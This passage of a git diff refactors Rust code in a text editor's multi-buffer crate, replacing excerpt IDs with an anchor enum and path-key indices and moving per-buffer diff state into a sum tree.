snapshot: &MultiBufferSnapshot) -> bool { + let Some(target) = self.try_seek_target(snapshot) else { + return false; + }; + let Some(buffer_snapshot) = snapshot.buffer_for_id(self.buffer_id()) else { + return false; + }; + // Early check to avoid invalid comparisons when seeking + if !buffer_snapshot.can_resolve(&self.text_anchor) { + return false; } + let mut cursor = snapshot.excerpts.cursor::(()); + cursor.seek(&target, Bias::Left); + let Some(excerpt) = cursor.item() else { + return false; + }; + let is_valid = self.text_anchor == excerpt.range.context.start + || self.text_anchor == excerpt.range.context.end + || self.text_anchor.is_valid(&buffer_snapshot); + is_valid + && excerpt + .range + .context + .start + .cmp(&self.text_anchor(), buffer_snapshot) + .is_le() + && excerpt + .range + .context + .end + .cmp(&self.text_anchor(), buffer_snapshot) + .is_ge() + } + + pub(crate) fn seek_target(&self, snapshot: &MultiBufferSnapshot) -> AnchorSeekTarget { + self.try_seek_target(snapshot) + .expect("anchor is from different multi-buffer") + } + + pub(crate) fn try_seek_target( + &self, + snapshot: &MultiBufferSnapshot, + ) -> Option { + let path_key = snapshot.try_path_for_anchor(*self)?; + let buffer = snapshot.buffer_for_path(&path_key).cloned(); + Some(AnchorSeekTarget::Excerpt { + path_key, + anchor: *self, + snapshot: buffer, + }) + } +} + +impl ToOffset for ExcerptAnchor { + fn to_offset(&self, snapshot: &MultiBufferSnapshot) -> MultiBufferOffset { + Anchor::from(*self).to_offset(snapshot) + } + + fn to_offset_utf16(&self, snapshot: &MultiBufferSnapshot) -> MultiBufferOffsetUtf16 { + Anchor::from(*self).to_offset_utf16(snapshot) + } +} + +impl ToPoint for ExcerptAnchor { + fn to_point(&self, snapshot: &MultiBufferSnapshot) -> Point { + Anchor::from(*self).to_point(snapshot) } + fn to_point_utf16(&self, snapshot: &MultiBufferSnapshot) -> rope::PointUtf16 { + Anchor::from(*self).to_point_utf16(snapshot) + } +} + +impl Anchor { pub fn is_min(&self) -> bool { - 
self.excerpt_id == ExcerptId::min() - && self.text_anchor.is_min() - && self.diff_base_anchor.is_none() + matches!(self, Self::Min) } pub fn is_max(&self) -> bool { - self.excerpt_id == ExcerptId::max() - && self.text_anchor.is_max() - && self.diff_base_anchor.is_none() + matches!(self, Self::Max) } - pub fn cmp(&self, other: &Anchor, snapshot: &MultiBufferSnapshot) -> Ordering { - if self == other { - return Ordering::Equal; - } + pub(crate) fn in_buffer(path: PathKeyIndex, text_anchor: text::Anchor) -> Self { + Self::Excerpt(ExcerptAnchor::in_buffer(path, text_anchor)) + } - let self_excerpt_id = snapshot.latest_excerpt_id(self.excerpt_id); - let other_excerpt_id = snapshot.latest_excerpt_id(other.excerpt_id); + pub(crate) fn range_in_buffer(path: PathKeyIndex, range: Range) -> Range { + Self::in_buffer(path, range.start)..Self::in_buffer(path, range.end) + } - let excerpt_id_cmp = self_excerpt_id.cmp(&other_excerpt_id, snapshot); - if excerpt_id_cmp.is_ne() { - return excerpt_id_cmp; - } - if self_excerpt_id == ExcerptId::max() - && self.text_anchor.is_max() - && self.text_anchor.is_max() - && self.diff_base_anchor.is_none() - && other.diff_base_anchor.is_none() - { - return Ordering::Equal; - } - if let Some(excerpt) = snapshot.excerpt(self_excerpt_id) { - let text_cmp = self.text_anchor.cmp(&other.text_anchor, &excerpt.buffer); - if text_cmp.is_ne() { - return text_cmp; - } - if (self.diff_base_anchor.is_some() || other.diff_base_anchor.is_some()) - && let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - .map(|diff| diff.base_text()) - { - let self_anchor = self.diff_base_anchor.filter(|a| a.is_valid(base_text)); - let other_anchor = other.diff_base_anchor.filter(|a| a.is_valid(base_text)); - return match (self_anchor, other_anchor) { - (Some(a), Some(b)) => a.cmp(&b, base_text), - (Some(_), None) => match other.text_anchor.bias { - Bias::Left => Ordering::Greater, - Bias::Right => Ordering::Less, - }, - (None, Some(_)) => match 
self.text_anchor.bias { - Bias::Left => Ordering::Less, - Bias::Right => Ordering::Greater, - }, - (None, None) => Ordering::Equal, - }; + pub fn cmp(&self, other: &Anchor, snapshot: &MultiBufferSnapshot) -> Ordering { + match (self, other) { + (Anchor::Min, Anchor::Min) => return Ordering::Equal, + (Anchor::Max, Anchor::Max) => return Ordering::Equal, + (Anchor::Min, _) => return Ordering::Less, + (Anchor::Max, _) => return Ordering::Greater, + (_, Anchor::Max) => return Ordering::Less, + (_, Anchor::Min) => return Ordering::Greater, + (Anchor::Excerpt(self_excerpt_anchor), Anchor::Excerpt(other_excerpt_anchor)) => { + self_excerpt_anchor.cmp(other_excerpt_anchor, snapshot) } } - Ordering::Equal } pub fn bias(&self) -> Bias { - self.text_anchor.bias + match self { + Anchor::Min => Bias::Left, + Anchor::Max => Bias::Right, + Anchor::Excerpt(anchor) => anchor.text_anchor.bias, + } } pub fn bias_left(&self, snapshot: &MultiBufferSnapshot) -> Anchor { - if self.text_anchor.bias != Bias::Left - && let Some(excerpt) = snapshot.excerpt(self.excerpt_id) - { - return Self { - excerpt_id: excerpt.id, - text_anchor: self.text_anchor.bias_left(&excerpt.buffer), - diff_base_anchor: self.diff_base_anchor.map(|a| { - if let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - .map(|diff| diff.base_text()) - && a.is_valid(&base_text) - { - return a.bias_left(base_text); - } - a - }), - }; + match self { + Anchor::Min => *self, + Anchor::Max => snapshot.anchor_before(snapshot.max_point()), + Anchor::Excerpt(anchor) => Anchor::Excerpt(anchor.bias_left(snapshot)), } - *self } pub fn bias_right(&self, snapshot: &MultiBufferSnapshot) -> Anchor { - if self.text_anchor.bias != Bias::Right - && let Some(excerpt) = snapshot.excerpt(self.excerpt_id) - { - return Self { - excerpt_id: excerpt.id, - text_anchor: self.text_anchor.bias_right(&excerpt.buffer), - diff_base_anchor: self.diff_base_anchor.map(|a| { - if let Some(base_text) = snapshot - .diffs - .get(&excerpt.buffer_id) - 
.map(|diff| diff.base_text()) - && a.is_valid(&base_text) - { - return a.bias_right(base_text); - } - a - }), - }; + match self { + Anchor::Max => *self, + Anchor::Min => snapshot.anchor_after(Point::zero()), + Anchor::Excerpt(anchor) => Anchor::Excerpt(anchor.bias_right(snapshot)), } - *self } pub fn summary(&self, snapshot: &MultiBufferSnapshot) -> D @@ -206,16 +342,111 @@ impl Anchor { } pub fn is_valid(&self, snapshot: &MultiBufferSnapshot) -> bool { - if self.is_min() || self.is_max() { - true - } else if let Some(excerpt) = snapshot.excerpt(self.excerpt_id) { - (self.text_anchor == excerpt.range.context.start - || self.text_anchor == excerpt.range.context.end - || self.text_anchor.is_valid(&excerpt.buffer)) - && excerpt.contains(self) - } else { - false + match self { + Anchor::Min | Anchor::Max => true, + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor.is_valid(snapshot), + } + } + + fn to_excerpt_anchor(&self, snapshot: &MultiBufferSnapshot) -> Option { + match self { + Anchor::Min => { + let excerpt = snapshot.excerpts.first()?; + + Some(ExcerptAnchor { + text_anchor: excerpt.range.context.start, + path: excerpt.path_key_index, + diff_base_anchor: None, + }) + } + Anchor::Excerpt(excerpt_anchor) => Some(*excerpt_anchor), + Anchor::Max => { + let excerpt = snapshot.excerpts.last()?; + + Some(ExcerptAnchor { + text_anchor: excerpt.range.context.end, + path: excerpt.path_key_index, + diff_base_anchor: None, + }) + } + } + } + + pub(crate) fn seek_target(&self, snapshot: &MultiBufferSnapshot) -> AnchorSeekTarget { + let Some(excerpt_anchor) = self.to_excerpt_anchor(snapshot) else { + return AnchorSeekTarget::Empty; + }; + + excerpt_anchor.seek_target(snapshot) + } + + pub(crate) fn excerpt_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + Anchor::Excerpt(excerpt_anchor) => Some(*excerpt_anchor), + } + } + + pub(crate) fn text_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + 
Anchor::Excerpt(excerpt_anchor) => Some(excerpt_anchor.text_anchor()), + } + } + + pub fn opaque_id(&self) -> Option<[u8; 20]> { + self.text_anchor().map(|a| a.opaque_id()) + } + + /// Note: anchor_to_buffer_anchor is probably what you want + pub fn raw_text_anchor(&self) -> Option { + match self { + Anchor::Min | Anchor::Max => None, + Anchor::Excerpt(excerpt_anchor) => Some(excerpt_anchor.text_anchor), + } + } + + pub(crate) fn try_seek_target( + &self, + snapshot: &MultiBufferSnapshot, + ) -> Option { + let Some(excerpt_anchor) = self.to_excerpt_anchor(snapshot) else { + return Some(AnchorSeekTarget::Empty); + }; + excerpt_anchor.try_seek_target(snapshot) + } + + /// Returns the text anchor for this anchor. + /// Panics if the anchor is from a different buffer. + pub fn text_anchor_in(&self, buffer: &BufferSnapshot) -> text::Anchor { + match self { + Anchor::Min => text::Anchor::min_for_buffer(buffer.remote_id()), + Anchor::Excerpt(excerpt_anchor) => { + let text_anchor = excerpt_anchor.text_anchor; + assert_eq!(text_anchor.buffer_id, buffer.remote_id()); + text_anchor + } + Anchor::Max => text::Anchor::max_for_buffer(buffer.remote_id()), + } + } + + pub fn diff_base_anchor(&self) -> Option { + self.excerpt_anchor()?.diff_base_anchor + } + + #[cfg(any(test, feature = "test-support"))] + pub fn expect_text_anchor(&self) -> text::Anchor { + self.excerpt_anchor().unwrap().text_anchor + } + + pub fn with_diff_base_anchor(mut self, diff_base_anchor: text::Anchor) -> Self { + match &mut self { + Anchor::Min | Anchor::Max => {} + Anchor::Excerpt(excerpt_anchor) => { + excerpt_anchor.diff_base_anchor = Some(diff_base_anchor); + } } + self } } diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index a593280d245fd01d623051953e48128c9935df45..a54ff64af028f44adced1758933f794e9a002c5a 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -8,6 +8,7 @@ use self::transaction::History; 
pub use anchor::{Anchor, AnchorRangeExt}; +use anchor::{AnchorSeekTarget, ExcerptAnchor}; use anyhow::{Result, anyhow}; use buffer_diff::{ BufferDiff, BufferDiffEvent, BufferDiffSnapshot, DiffChanged, DiffHunkSecondaryStatus, @@ -15,28 +16,30 @@ use buffer_diff::{ }; use clock::ReplicaId; use collections::{BTreeMap, Bound, HashMap, HashSet}; -use gpui::{App, Context, Entity, EntityId, EventEmitter}; +use gpui::{App, Context, Entity, EventEmitter}; use itertools::Itertools; use language::{ - AutoindentMode, BracketMatch, Buffer, BufferChunks, BufferRow, BufferSnapshot, Capability, - CharClassifier, CharKind, CharScopeContext, Chunk, CursorShape, DiagnosticEntryRef, File, - IndentGuideSettings, IndentSize, Language, LanguageScope, OffsetRangeExt, OffsetUtf16, Outline, - OutlineItem, Point, PointUtf16, Selection, TextDimension, TextObject, ToOffset as _, - ToPoint as _, TransactionId, TreeSitterOptions, Unclipped, - language_settings::{LanguageSettings, language_settings}, + AutoindentMode, Buffer, BufferChunks, BufferRow, BufferSnapshot, Capability, CharClassifier, + CharKind, CharScopeContext, Chunk, CursorShape, DiagnosticEntryRef, File, IndentGuideSettings, + IndentSize, Language, LanguageScope, OffsetRangeExt, OffsetUtf16, Outline, OutlineItem, Point, + PointUtf16, Selection, TextDimension, TextObject, ToOffset as _, ToPoint as _, TransactionId, + TreeSitterOptions, Unclipped, + language_settings::{AllLanguageSettings, LanguageSettings}, }; #[cfg(any(test, feature = "test-support"))] use gpui::AppContext as _; use rope::DimensionPair; +use settings::Settings; use smallvec::SmallVec; use smol::future::yield_now; use std::{ any::type_name, borrow::Cow, cell::{Cell, OnceCell, Ref, RefCell}, - cmp, fmt, + cmp::{self, Ordering}, + fmt, future::Future, io, iter::{self, FromIterator}, @@ -50,14 +53,13 @@ use std::{ use sum_tree::{Bias, Cursor, Dimension, Dimensions, SumTree, TreeMap}; use text::{ BufferId, Edit, LineIndent, TextSummary, - locator::Locator, 
subscription::{Subscription, Topic}, }; use theme::SyntaxTheme; -use util::post_inc; +use unicode_segmentation::UnicodeSegmentation; use ztracing::instrument; -pub use self::path_key::{PathExcerptInsertResult, PathKey}; +pub use self::path_key::PathKey; pub static EXCERPT_CONTEXT_LINES: OnceLock u32> = OnceLock::new(); @@ -65,9 +67,6 @@ pub fn excerpt_context_lines(cx: &App) -> u32 { EXCERPT_CONTEXT_LINES.get().map(|f| f(cx)).unwrap_or(2) } -#[derive(Debug, Default, Clone, Copy, Hash, PartialEq, Eq, PartialOrd, Ord)] -pub struct ExcerptId(u32); - /// One or more [`Buffers`](Buffer) being edited in a single view. /// /// See @@ -77,10 +76,6 @@ pub struct MultiBuffer { snapshot: RefCell, /// Contains the state of the buffers being edited buffers: BTreeMap, - /// Mapping from path keys to their excerpts. - excerpts_by_path: BTreeMap>, - /// Mapping from excerpt IDs to their path key. - paths_by_excerpt: HashMap, /// Mapping from buffer IDs to their diff states diffs: HashMap, subscriptions: Topic, @@ -96,27 +91,26 @@ pub struct MultiBuffer { buffer_changed_since_sync: Rc>, } +#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] +struct PathKeyIndex(u64); + #[derive(Clone, Debug, PartialEq, Eq)] pub enum Event { - ExcerptsAdded { + BufferRangesUpdated { buffer: Entity, - predecessor: ExcerptId, - excerpts: Vec<(ExcerptId, ExcerptRange)>, + path_key: PathKey, + ranges: Vec>, }, - ExcerptsRemoved { - ids: Vec, + BuffersRemoved { removed_buffer_ids: Vec, }, - ExcerptsExpanded { - ids: Vec, - }, - ExcerptsEdited { - excerpt_ids: Vec, + BuffersEdited { buffer_ids: Vec, }, DiffHunksToggled, Edited { edited_buffer: Option>, + is_local: bool, }, TransactionUndone { transaction_id: TransactionId, @@ -140,14 +134,14 @@ pub struct MultiBufferDiffHunk { pub buffer_id: BufferId, /// The range of the underlying buffer that this hunk corresponds to. pub buffer_range: Range, - /// The excerpt that contains the diff hunk. 
- pub excerpt_id: ExcerptId, /// The range within the buffer's diff base that this hunk corresponds to. pub diff_base_byte_range: Range, /// The status of this hunk (added/modified/deleted and secondary status). pub status: DiffHunkStatus, /// The word diffs for this hunk. pub word_diffs: Vec>, + pub excerpt_range: ExcerptRange, + pub multi_buffer_range: Range, } impl MultiBufferDiffHunk { @@ -160,17 +154,12 @@ impl MultiBufferDiffHunk { && self.buffer_range.start.is_min() && self.buffer_range.end.is_max() } - - pub fn multi_buffer_range(&self) -> Range { - let start = Anchor::in_buffer(self.excerpt_id, self.buffer_range.start); - let end = Anchor::in_buffer(self.excerpt_id, self.buffer_range.end); - start..end - } } pub type MultiBufferPoint = Point; +/// ExcerptOffset is offset into the non-deleted text of the multibuffer type ExcerptOffset = ExcerptDimension; -type ExcerptPoint = ExcerptDimension; +/// ExcerptOffset is based on the non-deleted text of the multibuffer #[derive(Copy, Clone, Debug, Default, Eq, Ord, PartialOrd, PartialEq, Hash, serde::Deserialize)] #[serde(transparent)] @@ -513,10 +502,6 @@ pub trait ToPoint: 'static + fmt::Debug { struct BufferState { buffer: Entity, - last_version: RefCell, - last_non_text_state_update_count: Cell, - // Note, any changes to this field value require updating snapshot.buffer_locators as well - excerpts: Vec, _subscriptions: [gpui::Subscription; 2], } @@ -527,8 +512,9 @@ struct DiffState { } impl DiffState { - fn snapshot(&self, cx: &App) -> DiffStateSnapshot { + fn snapshot(&self, buffer_id: BufferId, cx: &App) -> DiffStateSnapshot { DiffStateSnapshot { + buffer_id, diff: self.diff.read(cx).snapshot(cx), main_buffer: self.main_buffer.as_ref().map(|b| b.read(cx).snapshot()), } @@ -537,6 +523,7 @@ impl DiffState { #[derive(Clone)] struct DiffStateSnapshot { + buffer_id: BufferId, diff: BufferDiffSnapshot, main_buffer: Option, } @@ -549,6 +536,77 @@ impl std::ops::Deref for DiffStateSnapshot { } } +#[derive(Clone, 
Debug, Default)] +struct DiffStateSummary { + max_buffer_id: Option, + added_rows: u32, + removed_rows: u32, +} + +impl sum_tree::ContextLessSummary for DiffStateSummary { + fn zero() -> Self { + Self::default() + } + + fn add_summary(&mut self, other: &Self) { + self.max_buffer_id = std::cmp::max(self.max_buffer_id, other.max_buffer_id); + self.added_rows += other.added_rows; + self.removed_rows += other.removed_rows; + } +} + +impl sum_tree::Item for DiffStateSnapshot { + type Summary = DiffStateSummary; + + fn summary(&self, _cx: ()) -> DiffStateSummary { + let (added_rows, removed_rows) = self.diff.changed_row_counts(); + DiffStateSummary { + max_buffer_id: Some(self.buffer_id), + added_rows, + removed_rows, + } + } +} + +impl sum_tree::KeyedItem for DiffStateSnapshot { + type Key = Option; + + fn key(&self) -> Option { + Some(self.buffer_id) + } +} + +impl<'a> Dimension<'a, DiffStateSummary> for Option { + fn zero(_cx: ()) -> Self { + None + } + + fn add_summary(&mut self, summary: &DiffStateSummary, _cx: ()) { + *self = std::cmp::max(*self, summary.max_buffer_id); + } +} + +fn find_diff_state( + diffs: &SumTree, + buffer_id: BufferId, +) -> Option<&DiffStateSnapshot> { + let key = Some(buffer_id); + let (.., item) = diffs.find::, _>((), &key, Bias::Left); + item.filter(|entry| entry.buffer_id == buffer_id) +} + +fn remove_diff_state(diffs: &mut SumTree, buffer_id: BufferId) { + let key = Some(buffer_id); + let mut cursor = diffs.cursor::>(()); + let mut new_tree = cursor.slice(&key, Bias::Left); + if key == cursor.end() { + cursor.next(); + } + new_tree.append(cursor.suffix(), ()); + drop(cursor); + *diffs = new_tree; +} + impl DiffState { fn new(diff: Entity, cx: &mut Context) -> Self { DiffState { @@ -616,15 +674,31 @@ impl DiffState { } } +#[derive(Clone)] +struct BufferStateSnapshot { + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer_snapshot: BufferSnapshot, +} + +impl fmt::Debug for BufferStateSnapshot { + fn fmt(&self, f: &mut 
fmt::Formatter<'_>) -> fmt::Result { + f.debug_struct("BufferStateSnapshot") + .field("path_key", &self.path_key) + .field("buffer_id", &self.buffer_snapshot.remote_id()) + .finish() + } +} + /// The contents of a [`MultiBuffer`] at a single point in time. #[derive(Clone, Default)] pub struct MultiBufferSnapshot { excerpts: SumTree, - buffer_locators: TreeMap>, - diffs: TreeMap, + buffers: TreeMap, + path_keys_by_index: TreeMap, + indices_by_path_key: TreeMap, + diffs: SumTree, diff_transforms: SumTree, - excerpt_ids: SumTree, - replaced_excerpts: Arc>, non_text_state_update_count: usize, edit_count: usize, is_dirty: bool, @@ -639,24 +713,12 @@ pub struct MultiBufferSnapshot { show_headers: bool, } -// follower: None -// - BufferContent(Some) -// - BufferContent(None) -// - DeletedHunk -// -// follower: Some -// - BufferContent(Some) -// - BufferContent(None) - #[derive(Debug, Clone)] enum DiffTransform { - // RealText BufferContent { summary: MBTextSummary, - // modified_hunk_info inserted_hunk_info: Option, }, - // ExpandedHunkText DeletedHunk { summary: TextSummary, buffer_id: BufferId, @@ -668,52 +730,71 @@ enum DiffTransform { #[derive(Clone, Copy, Debug)] struct DiffTransformHunkInfo { - excerpt_id: ExcerptId, + buffer_id: BufferId, hunk_start_anchor: text::Anchor, hunk_secondary_status: DiffHunkSecondaryStatus, is_logically_deleted: bool, + excerpt_end: ExcerptAnchor, } impl Eq for DiffTransformHunkInfo {} impl PartialEq for DiffTransformHunkInfo { fn eq(&self, other: &DiffTransformHunkInfo) -> bool { - self.excerpt_id == other.excerpt_id && self.hunk_start_anchor == other.hunk_start_anchor + self.buffer_id == other.buffer_id && self.hunk_start_anchor == other.hunk_start_anchor } } impl std::hash::Hash for DiffTransformHunkInfo { fn hash(&self, state: &mut H) { - self.excerpt_id.hash(state); + self.buffer_id.hash(state); self.hunk_start_anchor.hash(state); } } #[derive(Clone)] -pub struct ExcerptInfo { - pub id: ExcerptId, - pub buffer: Arc, - pub buffer_id: 
BufferId, +pub struct ExcerptBoundaryInfo { + pub start_anchor: Anchor, pub range: ExcerptRange, pub end_row: MultiBufferRow, } -impl std::fmt::Debug for ExcerptInfo { +impl ExcerptBoundaryInfo { + pub fn start_text_anchor(&self) -> text::Anchor { + self.range.context.start + } + pub fn buffer_id(&self) -> BufferId { + self.start_text_anchor().buffer_id + } + pub fn buffer<'a>(&self, snapshot: &'a MultiBufferSnapshot) -> &'a BufferSnapshot { + snapshot + .buffer_for_id(self.buffer_id()) + .expect("buffer snapshot not found for excerpt boundary") + } +} + +impl std::fmt::Debug for ExcerptBoundaryInfo { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct(type_name::()) - .field("id", &self.id) - .field("buffer_id", &self.buffer_id) - .field("path", &self.buffer.file().map(|f| f.path())) + .field("buffer_id", &self.buffer_id()) .field("range", &self.range) .finish() } } +impl PartialEq for ExcerptBoundaryInfo { + fn eq(&self, other: &Self) -> bool { + self.start_anchor == other.start_anchor && self.range == other.range + } +} + +impl Eq for ExcerptBoundaryInfo {} + /// A boundary between `Excerpt`s in a [`MultiBuffer`] #[derive(Debug)] pub struct ExcerptBoundary { - pub prev: Option, - pub next: ExcerptInfo, + pub prev: Option, + pub next: ExcerptBoundaryInfo, /// The row in the `MultiBuffer` where the boundary is located pub row: MultiBufferRow, } @@ -722,7 +803,7 @@ impl ExcerptBoundary { pub fn starts_new_buffer(&self) -> bool { match (self.prev.as_ref(), &self.next) { (None, _) => true, - (Some(prev), next) => prev.buffer_id != next.buffer_id, + (Some(prev), next) => prev.buffer_id() != next.buffer_id(), } } } @@ -730,7 +811,7 @@ impl ExcerptBoundary { #[derive(Copy, Clone, Debug, PartialEq, Eq)] pub struct ExpandInfo { pub direction: ExpandExcerptDirection, - pub excerpt_id: ExcerptId, + pub start_anchor: Anchor, } #[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] @@ -744,45 +825,20 @@ pub struct RowInfo { } /// A slice into a 
[`Buffer`] that is being edited in a [`MultiBuffer`]. -#[derive(Clone)] -struct Excerpt { - /// The unique identifier for this excerpt - id: ExcerptId, +#[derive(Clone, Debug)] +pub(crate) struct Excerpt { /// The location of the excerpt in the [`MultiBuffer`] - locator: Locator, - /// The buffer being excerpted - buffer_id: BufferId, - /// A snapshot of the buffer being excerpted - buffer: Arc, + pub(crate) path_key: PathKey, + pub(crate) path_key_index: PathKeyIndex, + pub(crate) buffer_id: BufferId, /// The range of the buffer to be shown in the excerpt - range: ExcerptRange, + pub(crate) range: ExcerptRange, + /// The last row in the excerpted slice of the buffer - max_buffer_row: BufferRow, + pub(crate) max_buffer_row: BufferRow, /// A summary of the text in the excerpt - text_summary: TextSummary, - has_trailing_newline: bool, -} - -/// A public view into an `Excerpt` in a [`MultiBuffer`]. -/// -/// Contains methods for getting the [`Buffer`] of the excerpt, -/// as well as mapping offsets to/from buffer and multibuffer coordinates. -#[derive(Clone)] -pub struct MultiBufferExcerpt<'a> { - excerpt: &'a Excerpt, - diff_transforms: - sum_tree::Cursor<'a, 'static, DiffTransform, DiffTransforms>, - /// The offset in the multibuffer considering diff transforms. - offset: MultiBufferOffset, - /// The offset in the multibuffer without diff transforms. - excerpt_offset: ExcerptOffset, - buffer_offset: BufferOffset, -} - -#[derive(Clone, Debug)] -struct ExcerptIdMapping { - id: ExcerptId, - locator: Locator, + pub(crate) text_summary: TextSummary, + pub(crate) has_trailing_newline: bool, } /// A range of text from a single [`Buffer`], to be shown as an `Excerpt`. 
@@ -805,16 +861,37 @@ impl ExcerptRange { } } -#[derive(Clone, Debug, Default)] +impl ExcerptRange { + pub fn contains(&self, t: &text::Anchor, snapshot: &BufferSnapshot) -> bool { + self.context.start.cmp(t, snapshot).is_le() && self.context.end.cmp(t, snapshot).is_ge() + } +} + +#[derive(Clone, Debug)] pub struct ExcerptSummary { - excerpt_id: ExcerptId, - /// The location of the last [`Excerpt`] being summarized - excerpt_locator: Locator, + path_key: PathKey, + max_anchor: Option, widest_line_number: u32, text: MBTextSummary, count: usize, } +impl ExcerptSummary { + pub fn min() -> Self { + ExcerptSummary { + path_key: PathKey::min(), + max_anchor: None, + widest_line_number: 0, + text: MBTextSummary::default(), + count: 0, + } + } + + fn len(&self) -> ExcerptOffset { + ExcerptDimension(self.text.len) + } +} + #[derive(Debug, Clone)] pub struct DiffTransformSummary { input: MBTextSummary, @@ -990,13 +1067,13 @@ pub struct MultiBufferChunks<'a> { excerpts: Cursor<'a, 'static, Excerpt, ExcerptOffset>, diff_transforms: Cursor<'a, 'static, DiffTransform, Dimensions>, - diffs: &'a TreeMap, diff_base_chunks: Option<(BufferId, BufferChunks<'a>)>, buffer_chunk: Option>, range: Range, excerpt_offset_range: Range, excerpt_chunks: Option>, language_aware: bool, + snapshot: &'a MultiBufferSnapshot, } pub struct ReversedMultiBufferChunks<'a> { @@ -1050,8 +1127,8 @@ impl<'a, MBD: MultiBufferDimension> Dimension<'a, DiffTransformSummary> for Diff struct MultiBufferCursor<'a, MBD, BD> { excerpts: Cursor<'a, 'static, Excerpt, ExcerptDimension>, diff_transforms: Cursor<'a, 'static, DiffTransform, DiffTransforms>, - diffs: &'a TreeMap, cached_region: OnceCell>>, + snapshot: &'a MultiBufferSnapshot, } #[derive(Clone)] @@ -1066,8 +1143,8 @@ struct MultiBufferRegion<'a, MBD, BD> { } struct ExcerptChunks<'a> { - excerpt_id: ExcerptId, content_chunks: BufferChunks<'a>, + end: ExcerptAnchor, has_footer: bool, } @@ -1077,7 +1154,6 @@ struct BufferEdit { new_text: Arc, is_insertion: 
bool, original_indent_column: Option, - excerpt_id: ExcerptId, } #[derive(Clone, Copy, Debug, PartialEq)] @@ -1180,8 +1256,6 @@ impl MultiBuffer { singleton: false, capability, title: None, - excerpts_by_path: Default::default(), - paths_by_excerpt: Default::default(), buffer_changed_since_sync: Default::default(), history: History::default(), } @@ -1198,11 +1272,6 @@ impl MultiBuffer { *buffer_id, BufferState { buffer: buffer_state.buffer.clone(), - last_version: buffer_state.last_version.clone(), - last_non_text_state_update_count: buffer_state - .last_non_text_state_update_count - .clone(), - excerpts: buffer_state.excerpts.clone(), _subscriptions: [ new_cx.observe(&buffer_state.buffer, |_, _, cx| cx.notify()), new_cx.subscribe(&buffer_state.buffer, Self::on_buffer_event), @@ -1217,8 +1286,6 @@ impl MultiBuffer { Self { snapshot: RefCell::new(self.snapshot.borrow().clone()), buffers, - excerpts_by_path: Default::default(), - paths_by_excerpt: Default::default(), diffs: diff_bases, subscriptions: Default::default(), singleton: self.singleton, @@ -1229,8 +1296,15 @@ impl MultiBuffer { } } - pub fn set_group_interval(&mut self, group_interval: Duration) { + pub fn set_group_interval(&mut self, group_interval: Duration, cx: &mut Context) { self.history.set_group_interval(group_interval); + if self.singleton { + for BufferState { buffer, .. 
} in self.buffers.values() { + buffer.update(cx, |buffer, _| { + buffer.set_group_interval(group_interval); + }); + } + } } pub fn with_title(mut self, title: String) -> Self { @@ -1366,7 +1440,7 @@ impl MultiBuffer { _ => Default::default(), }; - let (buffer_edits, edited_excerpt_ids) = MultiBuffer::convert_edits_to_buffer_edits( + let buffer_edits = MultiBuffer::convert_edits_to_buffer_edits( edits, this.snapshot.get_mut(), &original_indent_columns, @@ -1387,14 +1461,12 @@ impl MultiBuffer { mut new_text, mut is_insertion, original_indent_column, - excerpt_id, }) = edits.next() { while let Some(BufferEdit { range: next_range, is_insertion: next_is_insertion, new_text: next_new_text, - excerpt_id: next_excerpt_id, .. }) = edits.peek() { @@ -1407,9 +1479,7 @@ impl MultiBuffer { if should_coalesce { range.end = cmp::max(next_range.end, range.end); is_insertion |= *next_is_insertion; - if excerpt_id == *next_excerpt_id { - new_text = format!("{new_text}{next_new_text}").into(); - } + new_text = format!("{new_text}{next_new_text}").into(); edits.next(); } else { break; @@ -1457,10 +1527,7 @@ impl MultiBuffer { }) } - cx.emit(Event::ExcerptsEdited { - excerpt_ids: edited_excerpt_ids, - buffer_ids, - }); + cx.emit(Event::BuffersEdited { buffer_ids }); } } @@ -1468,9 +1535,8 @@ impl MultiBuffer { edits: Vec<(Range, Arc)>, snapshot: &MultiBufferSnapshot, original_indent_columns: &[Option], - ) -> (HashMap>, Vec) { + ) -> HashMap> { let mut buffer_edits: HashMap> = Default::default(); - let mut edited_excerpt_ids = Vec::new(); let mut cursor = snapshot.cursor::(); for (ix, (range, new_text)) in edits.into_iter().enumerate() { let original_indent_column = original_indent_columns.get(ix).copied().flatten(); @@ -1515,11 +1581,10 @@ impl MultiBuffer { let buffer_end = (end_region.buffer_range.start + end_overshoot).min(end_region.buffer_range.end); - if start_region.excerpt.id == end_region.excerpt.id { + if start_region.excerpt == end_region.excerpt { if 
start_region.buffer.capability == Capability::ReadWrite && start_region.is_main_buffer { - edited_excerpt_ids.push(start_region.excerpt.id); buffer_edits .entry(start_region.buffer.remote_id()) .or_default() @@ -1528,7 +1593,6 @@ impl MultiBuffer { new_text, is_insertion: true, original_indent_column, - excerpt_id: start_region.excerpt.id, }); } } else { @@ -1537,7 +1601,6 @@ impl MultiBuffer { if start_region.buffer.capability == Capability::ReadWrite && start_region.is_main_buffer { - edited_excerpt_ids.push(start_region.excerpt.id); buffer_edits .entry(start_region.buffer.remote_id()) .or_default() @@ -1546,14 +1609,11 @@ impl MultiBuffer { new_text: new_text.clone(), is_insertion: true, original_indent_column, - excerpt_id: start_region.excerpt.id, }); } - let excerpt_id = end_region.excerpt.id; if end_region.buffer.capability == Capability::ReadWrite && end_region.is_main_buffer { - edited_excerpt_ids.push(excerpt_id); buffer_edits .entry(end_region.buffer.remote_id()) .or_default() @@ -1562,18 +1622,17 @@ impl MultiBuffer { new_text: new_text.clone(), is_insertion: false, original_indent_column, - excerpt_id, }); } + let end_region_excerpt = end_region.excerpt.clone(); cursor.seek(&range.start); cursor.next_excerpt(); while let Some(region) = cursor.region() { - if region.excerpt.id == excerpt_id { + if region.excerpt == &end_region_excerpt { break; } if region.buffer.capability == Capability::ReadWrite && region.is_main_buffer { - edited_excerpt_ids.push(region.excerpt.id); buffer_edits .entry(region.buffer.remote_id()) .or_default() @@ -1582,14 +1641,13 @@ 